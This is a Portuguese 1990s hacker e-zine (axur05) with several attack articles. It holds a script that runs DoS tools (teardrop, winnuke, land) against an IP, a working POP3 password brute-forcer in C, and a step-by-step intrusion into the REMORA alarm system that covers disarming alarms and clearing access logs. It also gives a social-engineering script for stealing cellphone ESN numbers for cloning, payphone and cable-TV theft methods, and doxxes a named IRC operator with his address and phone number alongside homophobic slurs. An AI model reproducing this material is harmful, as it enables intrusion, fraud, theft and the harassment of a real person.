/bin/echo " agora a sua foi invadia >:)" /usr/bin/sleep 1 /bin/echo -n "$1:~#" /usr/bin/sleep 1 /bin/echo -n " r" /usr/bin/sleep 1 /bin/echo -n "m" /usr/bin/sleep 1 /bin/echo -n " -" /usr/bin/sleep 1 /bin/echo "rf /" /usr/bin/sleep 10 /bin/ls /usr/bin /bin/echo "" /usr/bin/sleep 3 /bin/echo "" /bin/echo "based on jyhad security system! - modify by axur05" /bin/echo O IP $1 tentou $2 >> /var/adm/axur-security.log /usr/bin/sleep 15 ~/crash/bonk $1 > /dev/null 2>&1 ~/crash/teardrop $1 $1 -n 30 > /dev/null 2>&1 ~/crash/land $1 21 > /dev/null 2>&1 ~/crash/winnuke $1 > /dev/null 2>&1 ~/crash/ssping $1 $1 30 > /dev/null 2>&1 - deny 6 - Perdi a senha do root, o que fazer? ----------------------------------- Essa deduzo eu que seja de conhecimento geral. Se vc esqueceu a senha do super usuario da sua maquina ( que vergonha!! ) faca o seguinte: * Dah um reboot usando disco de boot. * Vai na instalacao normal ate o prompt. * No prompt digite o comando: mount -t ext2 /dev/hda3 /mnt Claro mudando o que for necessario para se adequar a sua maquina. * Edita o arquivo /mnt/etc/passwd usando o ed que e' o unico editor de texto disponivel nesse modo com os comandos: >-------- /mnt/bin/ed /mnt/etc/passwd 1 i root::0:0:root:/root:/bin/bash . 2 .d wq >--------- * Tira o disco * Crtl + alt + del * Loga sem senha nenhuma! :P ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 9:> Scan de terceira classe ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Indentificada pelos 3 primeiros bits (110) permite enderecamento de 2 na 8 HOST's, reservando 21 bits para o NetID e 8 para o HOST ID. E'in- dicada. E' indicado pra redes com menos de 254 HOST's. Mas quando encontramos um HOST ou um Gateway que tem ligacao com vari- as redes ou efetua a interconexao destas, como fica o enderecamento IP? Ai que serve tanto pra gateway, o HOST ID vai ser unico soh muda o NetID dependendo a rede. Meu objetivo inicial era derrubar uma rede dessas efetuando um broadcas- ting em massa numa Ethernet, ja que com Cypress detona e nao precisa nem ser em massa pra degradar o sistema. Quando se utiliza a "ALL 1s Broadcasting" direcionada o campo HOST ID e' preenchido de bits 1 e vamos enderecar pra rede que queremos por me- io do NetID. Utilizado pra redes internas... estou trabalhando no projeto chamado "broadcasting leech" que vai sugar todas infos de uma rede de frequen- cia limitada. #!/bin/sh # mude o que quiser, desde que saiba como faze-lo - by axur05 # use: Cscan [-n] a.b.c TMP1=/tmp/cscan$$ TMP2=/tmp/cscan$$a case $1 in -n) opt="-n" ; shift;; *) opt=" " esac network=$1; shift { seq 1 254 | # isso mesmo! what i wanna do? sed 's/.*/& 'network' .& 30/' sleep 2 } traceroute -d 5 $opt | # pinglist...? sed 's/ exceeded$//' > $TMP1 responses='cat $TMP1 | wc -l` # ai ai ai... sort -nu <$TMP1 | tee $TMP2 found=`cat $TMP2 | wc -l` echo $responses responses, $found found >&2 # nao precisa ficar bonito rm -f $TMP1 $TMP2 ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 10:> Falha nos sistemas de alarme com configuracao telefonica ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Muitos ja conhecem aqueles sistemas de alarmes que funcionam com aciona- mento via telefone. No caso a empresa de seguranca usa a linha para em certa hora do dia acionar o alarme e desliga-lo assim como for preciso. O grande misterio gira em torno do seu funcionamento e das maneiras as quais podemos frauda-lo. A maioria das residencias qu e possuem este tipo de alarme possuem duas linhas. Isso serve para que o alarme ao ser ligado nao utilize da linha no qual ja tem alguem falando. O sistema usado nesses casos e pra muitos outro modos de administracao de qualquer atividade telefonica se chama REMORA, este sofware esta cus- tando em torno de 400 reais e vamos colocar a disposicao de todos vcs lo- go logo na nossa pagina ( www.axur05.org ) Vamos aos dados que precisamos para burlar este sistema: - acionamento via linha telefonica ( horario default 23:00 ate 23:10 ) - desacionamento via linha telefonica ( 5:50 ate 6:00 ) Como proceder: 1- ) Descubra uma residencia que usa este sistema de seguranca 2- ) Descubra o numero da casa 3- ) Descubra o numero do telefone ( as vezes sao dois numeros ) 4- ) Soh isso... por enquanto No horario default vc precisa ligar pra casa do elemento usando um programa do tipo terminal ( recomendo minicom ). Quando o telefone atender vai dar sinal de dados, espere um momento e' como se fosse conectar a internet. Vai aparecer a seguinte mensagem: ****************************************************************** REMORA Modo de Administracao de Sistema de Seguranca v3.9 1997 ****************************************************************** Numero de identificacao: ( coloque o numero da casa ) Senha: ( pressione CRTL+T e depois remora%1 ) Voce vai cair num prompt assim: Rv3.9>> Se der tudo certo por dar um pulo de alegria pq vc ta dentro! Eu vejo isso apenas com proposito de que eu possa fazer ligacoes usando a linha telefonica do carinha... no caso a segunda. Digite o seguinte: Rv3.9>> line Linhas disponiveis --- Linha 1. > ???-???? Linha 2. > ???-???? Rv3.9>> dataline Linha 1. Rv3.9>> set line 2 Rv3.9>> terminal Remora Terminal: atdp numero-de-uma-bbs-na-alemanha Conectando... ---- Heheheh,.... o resto vc pode imaginar! Vc esta pagando ligacao local e o imbecil q acha q tem o melhor sistema de alarmes do mundo ta se fudendo! ( ai que boca suja que eu tenho ). Outras opcoes: Rv3.9>> disp alarm set off Soh nao vai assaltar a casa deles ne' seu chatinho! :) Ou depois... Rv3.9>> list Ultimos acessos via linha telefonica... pra limpar o seu digite Rv3.9>> clear -n ( numero do acesso ) Bah! Tomara que eu nao seja preso por isso, os comandos nao sao dados com a opcao help! Ahh.. use o nome do cara, numero da casa ou nome da empresa na senha no caso da versao do Remora ser superior ou a essa... sempre funciona. ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 11:> Info & Misc and Shiiiiiiit ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by axur05' editors ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù 1 : Axur05 e seu script pra Bitchx. ----- Esta para ser lancado a uso publico o script pra bitchx da axur05, com varias utilidades e inovacoes ( nao por ser nosso ) creio que seja um dos melhores disponiveis na net ate o momento. Entre suas funcoes esta, converte os caracteres ascii, le arquivos de som, facilidade no manuseio de janelas e outros.. Ele podera ser baixado apatir da nossa home-page www.axur05.org logo logo.... 2 : Pessoas que querem acabar com a axur05. ----- LEIAM O TRECHO ABAIXO E TIREM SUAS CONCLUSOES >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> *- log do papo entre ircops -* !XPTO! WALLOPS: Este papo de ACIDMUD em minha opiniao, vamos fazer o mesmo com ele ! pagar na mesma moeda !_Lu_! e depois apareceu um fodao tambem... o whisky killou e ele voltou sem ircop... !Solitario! Qualquer coisa: Solitario (021) 221-6562 !CHAPA! deve ta cheio de biscoitinho ai anotando! hehehe !Solitario! Isso ai e Telefone do Servico.. :) So eu mesmo atendo.. ELe so fiunciona a Noite !XPTO! WALLOPS: Biscoitinho creme cracker !_Lu_! grande XPTO... bom senso e capacidade de observacao... :))) !_Lu_! solitario... por que ta distribuindo o tel assim??? !Solitario! p/ ligarem me ameacando de morte.. :) !CHAPA! alguem me manda um fake dcc ae !Lancelot! chapa esse papo de hack server de novo tah valendo? Tive fora uns tempos !CHAPA! mais do ke valendo./... e' so' esperar !CHAPA! a nao ser ke dessa vez alguem faça alguma coisa pra PREVENIR e nao pra REMEDIAR !XPTO! WALLOPS: Galera, desta vez o que o ACID quer ? ser o dono da Brasirc ? !Solitario! Lance ce ta recebendo e-mail da lista ? !Lancelot! da lista de abusos acho q sim - e acabei de enviar alguns !XPTO! WALLOPS: Chapa cade' o biscoito do ACIDMUD ? !CHAPA! sei la dele... nem kero saber... kero mais e' ke suma mesmo!:-) !XPTO! WALLOPS: Mas nao vai nao ! e ainda vai ter gente querendo fazer acordos ! quer apostar ? !CHAPA! vai naum.. .pq se tiver eu dou um sopapo!:-) !XPTO! WALLOPS: Cara, ele deve ser um pisicopata frustado ! vai ver que e' ate boiola !CHAPA! hehehe... num vou entrar em detalhes da vida particular dele pq pouco me interessa. So nao quero que ele se meta com a BrasIRC !XPTO! WALLOPS: Uma vez eu disse a ele, se ele hackear a MEDNET (nada e' impossivel) eu vou busca-lo na casa dele ! e falo serio ! !XJoker! bah.. que melda... tou acostumado com o ircii.. /who 0 -o e deu mor floodao aqui :) !XPTO! WALLOPS: mandei ate proxy ! alias vamos atualizar esta meleca ! !CHAPA! kestao num e' atualizar, o After todo dia atualiza... questao e' cadastrarem !XPTO! WALLOPS: entao e' clone !CHAPA! pode mandar bala presses caras deixarem de ser preguiçosos e reclamoes e passarem a cadastrar !CHAPA! Acho esta histo'ria de registrar nick uma grande palhacada. !CHAPA! essa antinha ke ta falando !XPTO! WALLOPS: 30 clones que se habilita ? !XPTO! WALLOPS: so que e' proxy !XPTO! WALLOPS: -> Proxy Encontrado ! !CHAPA! quem sabe usar essa droga de zipcrack? !XPTO! WALLOPS: Nao Chapa, sei comer biscoito Creme Cracker ? Serve ? !K-io! eehehehhehehe ********************* * * Nao poderia ser de outra forma... XPTO e' ircop destaque! Merece receber os parabens do pessoal via telefone! Entao ai vai os dados do nosso ircops do mes! - / - ADMINISTRADOR DO MES - / - Nickname: XPTO Admin: mednet.com.br ou merdanet.com.br Rede: BRASIRC Nome: Rolando Rubens Malvasio Junior Telefone: (034) 313-7381 Endereco: Rua Joao Alves Ribeiro, 149 Bairro: Olinda Cidade: Uberaba-MG CC/VISA: OBJETIVOS: Impedir que a brasirc seja infestada por hackers. RELIGAO: Testemunha de Jeovah SEXO: Indefinido ( papai queria uma menina ) SONHO: Ser respeitado / matar nosso pessoal / casar com o Nelson Ned POLITICA: PGB - Partido Gay Brasileiro LAZER: Gosto de jogar frescobol de sunga. - / - ADMINISTRADOR DO MES - / - Pra variar na brashit nossos nicks estao com Q-LINE na maioria dos ser- vers, quando trocamos pra ele aparece a msg "Born to be lamer". Palmas pro competentes ircops... tsc tsc tsc! 3 : Projetos Todos os projetos serao encontrados logo logo na nossa pagina. Assim como a ajuda que necessitamos em tal segmento. 4 : Criticandos os criticos Me sinto um idiota escrevendo isso, mas a pouco tempo apareceu um zine chamado MOSca que nos atacou diretamente, eles nem mereciam ser mencio- nados devido a sua insignificancia mas e' que eles sao tao retardados q me senti obrigado. Primeiro gostaria de saber pq aqueles pirralhos imbe- cis escrevem usando numeros? Nao sabem escrever direito? Isso os torna malvados? Estragou as vogais do teclado? Depois gostaria de lancar um desafio... ja que vcs sao tao bons, invadam o site da axur05.org Eu SEI quem escreveu aquela merda e ele sabe que eu sei, nao passa de um ex-membro da axur05 que devido a sua ignorancia foi mandado embora. Pirralho fracassado, vai dar tua banda e se recolha na sua vidinha xra- ted... sem mais! please! bugoff! Obs. Legal o fato de vcs terem copiado tudo aquelas coisas do guia tele- fonico! Agora sei coisas que NINGUEM sabe! :P 5 : Orelhoes! Esse e' simpls mas nao sei se tem em tudo que e' lugar, eu nao trabalho na companhia telefonica. Sempre perto dos orelhoes tem um poste que re- cebe o fio que leva a rede telefonica. Abra essa caixinha que tem dois parafusos e tire o bloco preto que tem entre os pares. Gotcha! Tente te- lefonar! Soh funca nos antigos. ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 12:> POP Hacking - O que eu preciso saber sobre isso? ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Bom, pra comeco de conversa o que e' o hack por pop? O "Post Office Protocol" e' um sistema que possibilita a um usuario pegar seus mails remotamente sem ter que montar um pedaco do mail-spool usando arquivo de acesso remoto tipo NFS. O POP loga usuarios para acessar suas mensagens de mail individualmente, para setar limites de comprimento maximo da mensagem que o client pode retirar, e para deixar o mail no server ate que a mensagem tenha sido deletada. Pra acessar POP vc precisa ser autenticado usando uma senha e um login que tenham validade no sistema. O POP geralmente usa a mesma senha que o usuario usa pra acesso shell ou coisas do genero, entao alguem com um sniffer packet pode facilmente catar senhas. Quando vc se loga pela porta 109 e mais frequentemente 110 apresenta-se o seguinte banner: +OK POP3 server ready <321.123134652@axur05.org> user axuriano +OK Password requied for axuriano pass not4you +OK maildrop has 1 message ( 396 octets ) Agora se imaginou um metodo em que se tenta-se com uma lista de palavras logar no POP, consequentemente logaria-se na maquina. Isso e' bom quando se deixa fazendo numa maquina que vc tiver abandona- da. Eu por exemplo quando ja tentei de tudo e fracassei deixo 1 dia com o POP Hack de uma maquina local em qualquer lugar do mundo tentando na vitima. Para aqueles que acham POP hack uma frescura eu digo, vale a pena ten- tar, pq MUITAS maquinas possuem senhas setadas no default e isso faci- lita muito o trabalho. [dashunberg:~#] pop3 italnet.com.br login senha USUARIO: teste SENHA: 123456 [dashunberg:~#] Obs. Este exemplo acima e' real. ( acesso usuario, sem shell ) No arquivo de login coloque os usuarios dos provedores que vc sabe que tem acesso shell, como os abaixo: operator, administrador, ftp, webmaster, portmaster, adm, sysadm, admin e ircadmin Ja no arquivo de senha vc deve colocar wordlist relativamente pequenas e bem feitas. Com palavras que sao bastante usadas. Este tipo de investida por ser rastreada mas muitas vezes nao e',o admin mais inocente soh vai perceber depois quando ver no diretorio /tmp uma serie de arquivos do gerados pelo POP. Lembre-se quem nem todas as maquinas sao vulneraveis, versoes novas do POP ou programas de seguranca evitam estes ataques. Fonte do programa abaixo. -------------------------------pop3.c----------------------------------- /* Desconheco o autor do fonte */ #include #include #include #include #include #include #include #include #include /* Aqui e' definida a port onde o programa ira agir. */ #define POP3_PORT 110 #define MASKAS "vi" /* Aqui vc tem a opcao de deixar 0 no caso de hackear uma senha e desconectar ou deixar setado 1 no caso de reconectar e continuar tentando */ #define RECONNECT 0 /* The function prototypes */ void nuke_string(char *); int pop_connect(char *); int pop_guess(char *, char *); char *getanswer(char *); char *getanswer_(char *); void swallow_welcome(void); void hackity_hack(void); int popfd; FILE *popfp; FILE *userfile; FILE *dictfile; char host[255]; char dict[255]; char user[255]; main(int argc, char **argv) { if(argc < 4) { /* erro de sintaxe reportado e programa abortado */ printf("Sintaxe: %s host userfile dictfile\n", argv[0]); exit(0); } /* checando se o host realmente existe */ if(pop_connect(argv[1]) == -1) { /* erro no host */ printf("Erro ao connectar o host %s\n", argv[1]); exit(0); } printf("Conectado em: %s\n\n", argv[1]); /* checando existencia do arquivo de usuarios */ userfile=fopen(argv[2], "rt"); if(userfile==NULL) { /* erro no arquivo de usuarios */ printf("Erro ao abrir o arquivo %s\n", argv[2]); exit(0); } fclose(userfile); /* Checando a existencia do arquivo de palavras */ dictfile=fopen(argv[3], "rt"); if(dictfile==NULL) { /* erro no arquivo de palavras */ printf("Erro ao abrir o arquivo %s\n", argv[3]); exit(0); } fclose(dictfile); strcpy(host, argv[1]); strcpy(user, argv[2]); strcpy(dict, argv[3]); nuke_string(argv[0]); nuke_string(argv[1]); nuke_string(argv[2]); nuke_string(argv[3]); strcpy(argv[0], MASKAS); swallow_welcome(); hackity_hack(); } void nuke_string(char *targetstring) { char *mystring=targetstring; while(*targetstring != '\0') { *targetstring=' '; targetstring++; } *mystring='\0'; } int pop_connect(char *pophost) { int popsocket; struct sockaddr_in sin; struct hostent *hp; hp=gethostbyname(pophost); if(hp==NULL) return -1; bzero((char *)&sin,sizeof(sin)); bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length); sin.sin_family=hp->h_addrtype; sin.sin_port=htons(POP3_PORT); popsocket=socket(AF_INET, SOCK_STREAM, 0); if(popsocket==-1) return -1; if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1; popfd=popsocket; return popsocket; } int pop_guess(char *username, char *password) { char buff[512]; sprintf(buff, "USER %s\n", username); send(popfd, buff, strlen(buff), 0); getanswer(buff); sprintf(buff, "PASS %s\n", password); send(popfd, buff, strlen(buff), 0); getanswer(buff); if(strstr(buff, "+OK") != NULL) { printf("USUARIO: %s\nSENHA: %s\n\n", username, password); return 0; } else return -1; } char *getanswer(char *buff) { for(;;) { getanswer_(buff); if(strstr(buff, "+OK") != NULL) return buff; if(strstr(buff, "-ERR") != NULL) return buff; } } char *getanswer_(char *buff) { int ch; char *in=buff; for(;;) { ch=getc(popfp); if(ch == '\r'); if(ch == '\n') { *in='\0'; return buff; } else { *in=(char)ch; in++; } } } void swallow_welcome(void) { char b[100]; popfp=fdopen(popfd, "rt"); getanswer(b); } void hackity_hack(void) { char *un; char *pw; char *c; int found=0; un=(char *)malloc(512); pw=(char *)malloc(512); if(un==NULL || pw==NULL) return; userfile=fopen(user, "rt"); dictfile=fopen(dict, "rt"); if(userfile == NULL || dictfile == NULL) return; for(;;) { while(fgets(un, 50, userfile) != NULL) { found=0; c=strchr(un, 10); if(c != NULL) *c=0; c=strchr(un, 13); if(c != NULL) *c=0; while(fgets(pw, 50, dictfile) != NULL && found==0) { c=strchr(pw, 10); if(c != NULL) *c=0; c=strchr(pw, 13); if(c != NULL) *c=0; if(strlen(pw) > 2 && strlen(un) > 2) if(pop_guess(un, pw)==0) { found=1; fclose(popfp); close(popfd); if(RECONNECT==0) { free(pw); free(un); fclose(userfile); fclose(dictfile); exit(0); } pop_connect(host); swallow_welcome(); } } fclose(dictfile); dictfile=fopen(dict, "rt"); } fclose(dictfile); fclose(userfile); free(un); free(pw); exit(0); } } -------------------------------pop3.c----------------------------------- Os fontes podem estar meio complicados e feios... mas realmente funcio- nam. Tentei compacta-los da forma mais funcional possivel. Para compilar digite ao prompt: gcc -o pop3 pop3.c ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 13:> Obtendo um numero ESN/MIN ( anarcophreaking ) ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Sabe-se que e' indispensavel para clonar um celular algumas coisas, entre elas esta o tao desejado hexadecimal que e' necessario na programacao do telefone. Para obter este numero existem inumeros me'todos... alguns mui- to complexos e nem sempre faceis ( caros demais ) de se obter. Entre eles se encontram os scanners, estes fazem leituras a procura de frequencias por meio das quais captam o numero do ESN/MIN do celular. Como nem todos no's podemos ir ate o Paraguai a procura de um scanner des- te tipo entao proponho a voces um metodo nem um pouco menos ortodoxo de adquiri-lo. Prestem bem a atencao, se voce nao for um cara inteligente e desinibido nao sugiro que faca o que estou colocando abaixo, porque alem de voce cor- rer o risco de ser descoberto pode tambem estragar a chance de muitos ou- tros amigos da mesma cidade de obter sucesso na operacao. O processo se mantem por meio de conversa telefonica ( e'... isso mesmo ) onde voce vai passar a perna na telefonica e em uma loja credenciada a te- lefonica do seu estado. Como sou gaucho vou usar como exemplo a CRT e co- mo loja credenciada a habilitar celulares vou usar como exemplo o estabe- lecimento "Loja_Cell_X". Para realizar o trabalho primeiro voce vai ter que buscar por meio de um guia telefonico o telefone de uma loja qualquer... ligue para lah pergun- te se ela e' credenciada. Se a resposta for "SIM, SOMOS CREDENCIADOS JUN- TOS A CRT PARA HABILITAR CELULARES", voce achou sua vitima. Perguntar o nome da pessoa com quem voce esta falando, ou do responsavel na loja pela parte de celuluares. ( Vai ser util depois ). Para que tudo de certo nao faca tudo isso em um dia, ou convide um amigo seu para ajudar usando as- sim duas vozes diferentes. Agora ligue para a empresa ( estatal, argh ) ou ( privada =)) que cuida da parte telefonica no seu estado. ex. telesc, crt, telerj, telepar, te- lesp... Invente um nome bem pomposo... como Luis Carlos Vieira Dialogo: ---- CRT, em que posso ajuda-lo? Boa tarde, eu trabalho aqui na Loja_Cell_X e preciso do segundo numero telefonico do departamento de celular porque o primeiro soh da ocupado. Desculpe senhor, mas temos apenas um telefone. Entao eu acho que estou ligando errado, e tenho um cliente com problemas aqui, a senhora poderia me dar o numero certo? ---- Se a velha torrar o saco com a pergunta "Que numero o senhor estava ligando?" invente um, se ela torrar denovo ai voce fala: ---- Senhora, estou meio atrapalhado aqui porque a menina que cuida desta parte nao veio hoje. Tem mais 3 pessoas esperando para habilitar e eu estou ficando louco. ---- Ok, o telefone e' 234-56-78 ---- Segunda parte do plano, ligar para este numero que a velha te deu que vai cair na Celular CRT... prepare-se, e se voce nao tiver voz de homem nem faca... =) ---- Boa tarde, Alfredo falando! Em que posso ajuda-lo? ---- Bom... ai voce vai ter que receber ajuda do nome daquele carinha da loja de celular que vc ligou no inicio. Digamos que o nome do simpatico rapaz responsavel pela parte de telefonica celular na Loja_Cell_X seja Joao da Silva. ---- Ola amigo, eu trabalho na Loja_Cell_X e preciso de uma ajuda sua, o Joao da Silva pediu para que eu ligasse e pergunta-se qual o numero do ultimo processo nosso que entrou ai de habilitacao de celular. Porque estamos com um probleminha aqui de organizacao... Soh um momento amigo, vou dar uma olhada aqui. ---- Espere ( geralmente um TEMPAO ), mas nao fiquei irritado, porque pelo que eles ganham, nao pode-se exigir muito. ---- Olha temos aqui um ultimo processo de voces de habilitacao que consta no numero 190. Aham... anotei! Agora poderia me falar no nome de quem esta? Claro! No nome do Amaral Silveira. Muito obrigado amigo! E tenha um bom dia. ---- Ligando para a Loja_Cell_X: Gostaria de falar com o Joao da Silva, diga para ele que e' da Celular CRT. Boa tarde, em que posso ajuda-lo? Sou do departamento de habilitacao de celulares da CRT, o Alfredo pediu para que eu ligasse e falasse com voce. Estou com problema no processo de habilitacao do celular do Sr. Amaral Silveira, deixa eu ver aqui... processo numero 190. Sera que eu poderia conferir os dados? ---- Claro... deixa eu pegar minha copia. Wating............. ---- Ok! O que voce precisa? Preciso do ESN/MIN porque acho que muito apagado a copia que eu tenho. Ok! O hexa do aparelho e' ??????????? Obrigado amigo! Valeu a forca..... =) ---- Pronto meu amigo! Agora vc tem o seu numero hexadecimal necessario na clonagem do seu celular! Este processo parece demorado e tal... mas vale a pena, e sabe bem disso quem tem um numero desses. Pode fazer o processo em dois ou tres dias se necessario para que ninguem desconfie. Nao me culpe se voce nao conseguir... apenas fique calmo e fa- le com seriedade! Nao pode dar errado... pelo menos comigo sempre deu certo! E fale com seus amigos interessados em phreaking da mesma cidade para que voces nao fiquem pegando sempre a mesma loja ( coitados ). ....phuck, phuck, phuck and phreak. ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 14:> Rouch Motel - the bad guys's jail ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Este shell script vai emular um login falso e maneira a deixar o cara confiante da invasao... pero... com uma boa base de monitoramento pra vc que sabera do paradero deste. Feito a base de que com essas informacoes possa ser portado para qualquer sistema UNIX. Nao se esqueca de pensar como os administradores e entender suas safade- zas... soh assim podera evoluir. - jaula.sh # jaula para aprisionar o hacker malvado # ou lamers cheirando a talco... # `the axur05's choice 98\n` SUCKERROOT=/usr/spool/hacker login=`echo $CDEST | cut -f4 -d!` home=`egrep "^$login:" $SUCKERROOT/etc/passwd | cut -d: -f6` PATH=/v:/bsd43:/sv; export PATH HOME=$home; export HOME USER=$login; export USER SHELL=/v/sh; export SHELL unset CSOURCE CDEST # catando tty e pid pra setar falso utmp tty=`/bin/who | /bin/grep $login | /usr/bin/cut -c15-17 | /bin/tail -1` /usr/adm/uttools/telnetuseron /usr/spool/hacker/etc/utmp \ $login $tty $$ 1> /dev/null 2>/dev/null chown $login /usr/spool/hacker/dev/tty$tty 1> /dev/null 2>/dev/null /etc/chroot /usr/spool/hacker /v/su -c "$login" /v/sh -c "cd $HOME; exec /v/sh /etc/profile" /usr/adm/uttools/telnetuseroff /usr/spool/hacker/etc/utmp $tty \ > /dev/null 2> /dev/null - jaula.sh ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 15:> Roubando TV `a Cabo * GUIA DEFINITIVO * ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù 1 - Consideracoes iniciais 2 - Requisicoes 3 - Como se estuda a producao de uma rede 3.1 - Estudo de Disponibilidade de Meios Fisicos da Cidade 3.2 - Estudo de Disponibilidade de meios de Comunicacao 3.3 - Levantamento de Campo 3.4 - Definicao dos canais e servicos prestados 3.5 - Definicao da arquitetura da rede 3.6 - Definicao do Local do Headend e seus equipamentos 3.7 - Definicao dos Equipamentos da Rede 3.8 - Realizacao do Projeto Tecnico da Rede 3.9 - Definicao dos Padroes de Construcao 3.10- Construcao e Ativacao da Rede de Conexao dos Assinantes 4 - Os Equipamentos Basicos da TV via Cabo 5 - A Rede de TV via Cabo 6 - Arquitetura da Rede 7 - Equipamentos mais Usados 8 - Vamos comecar a roubar... 8.1 - Observacoes gerais 8.2 - Conectando o Cabo ate o Postinho de Entrada 8.3 - Conexao do Cabo ate a Rede Externa 8.4 - Distribuicao Interna 8.5 - Componentes a serem usados na instalacao 8.6 - Metodologia da Instalacao Interna 8.7 - Esquema Eletrico de Distribuicao Interna 8.8 - Funcionamento dos Conectores 8.8.1 - Preparo do Conector RG-59 ( para cabo RG-59 ) 8.8.2 - Preparo do Conector RG-11 ( para cabo RG-11 corse... ) 8.9 - Esquema de Ligacao 9 - Mais facil, com pouco aproveitamento intelectual 10 - Falhas e Testes 11 - Glossario ( LEIA ISSO QUANDO NECESSARIO ) 12 - Truques e sacanagens >>--------------<< 1. Consideracoes iniciais:. ^^^^^^^^^^^^^ ^^^^^^^^^^ Rapaziada, resolvi escrever este artigo original e muito tecnico a rigor de que ate onde sei nao existe documento nenhum em lugar nenhum em por- tugues que trate deste assunto! Mais uma vez a axur05 sai na frente com originalidade nos seus projetos. Ate onde se sabe o crime ligando TV `a Cabo no Brasil e' bem conhecido porem pouco executado, sabe-se que e' possivel, mas nao se sabe como por faltar informacoes basicas extremamente necessarias nessa pratica. A maioria de vcs sabe a merda que e' no final do mes ter que pagar pra porra da NET, MULTICANAL ou TVA uma quantia que eu considero absurda por um servico que agora monopolizado nos vende informacao, como somos todos a favor da liberdade no amplo sentido da palavra vou tentar passar nessas minhas humildes palavras todo procedimento partindo e' claro do entendi- mento. Sendo que com o que colocarei abaixo sera possivel montar ate uma rede externa. =)) Olha, tem muito nomes estranhos a primeira vista pra nao ficar explicando eles sempre fiz um glossario no final! Nao exite em consulta-lo. 2. Requisicoes:. ^^^^^^^^^^^^^ Conhecimento basico de eletronica, ter a sua disposicao material e ser um fucador nato! Lamers otarios, vcs nao querem o entendimento completo entao pulem ate a parte 9. 3. Como se estuda a producao de uma rede:. ^^^^ ^^ ^^^^^^ ^ ^^^^^^^^ ^^ ^^^ ^^^^^^ 3.1 - Estudo de Disponibilidade de Meios Fisicos da Cidade Define as possiveis rotas de cabos e a existencia de postes, dutos, caixas e facilidades das empresas de eletricidade e telefonia de mo- do a serem utilizadas. Evita gastos com infra-estrutura. 3.2 - Estudo da Disponibilidade de Meios de Comunicacao Define a disponibilidade de meios de comunicacao ja existentes, como rotas de Fibras Oticas e Centro de Distribuicao, de modo a tornar possivel a integracao futura de servicos com telefonia, por exemplo. 3.3 - Levantamento de Campo E' quando se efetua a contagem de casas nas eas de interesse e a distancia entre postes, dutos e caixas, gerando um mapa base, que juntamente com os estudos anteriores servira de base a definicao da Arquitetura de Rede. 3.4 - Definicao dos canais e servicos prestados Etapa onde define-se 